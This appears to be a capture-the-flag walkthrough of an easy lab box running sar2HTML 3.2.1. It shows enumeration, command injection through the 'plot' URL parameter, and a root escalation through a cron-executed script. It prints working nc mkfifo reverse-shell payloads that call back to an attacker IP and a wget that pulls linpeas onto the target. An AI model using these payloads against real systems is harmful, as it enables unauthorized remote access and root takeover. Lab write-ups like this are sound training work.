RATING
Easy
ENUMERATION
First, we kick it off with our usual nmap scan for these types of boxes:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.177.35
Navigating over to the target in our browser, all we see is an Apache2 default page. So, we proceed with a directory bruteforce using feroxbuster:
Command: feroxbuster -u http://192.168.177.35/ -w /usr/share/wordlists/dirb/common.txt -k --quiet -s 200
Checking out robots.txt, we find the sar2HTML directory:
Navigating over to the sar2HTML directory, we see that it’s running version 3.2.1 of sar2html:
Using searchsploit, we look up sar2html and see that is has a remote code execution exploit:
EXPLOITATION
In order to execute this exploit, we create a nc mkfifo reverse shell using revshells and URL encode it:
Reverse shell: rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.45.205%201234%20%3E%2Ftmp%2Ff
We start a netcat listener on port 1234 and navigate over to:
http://192.168.177.35/sar2HTML/index.php?plot=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.45.205%201234%20%3E%2Ftmp%2Ff
And catch our shell as user www-data:
PRIVILEGE ESCALATION
We run a simple python3 web server on our local machine and transfer linpeas.sh over to our target:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.205/linpeas.sh (on target)
Running this script, we discover that cronjob is running a finally.sh script as root every 5 minutes:
Taking a look at the contents of this script, we can see that it is executing another file named write.sh:
We simply overwrite the contents of write.sh with our nc mkfifo reverse shell (using a different port):
Reverse shell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.205 443 >/tmp/f
Command: echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.205 443 >/tmp/f" > write.sh
After starting our netcat listener on port 443 and waiting for 5 minutes, we are able to catch our root shell and read our flag:
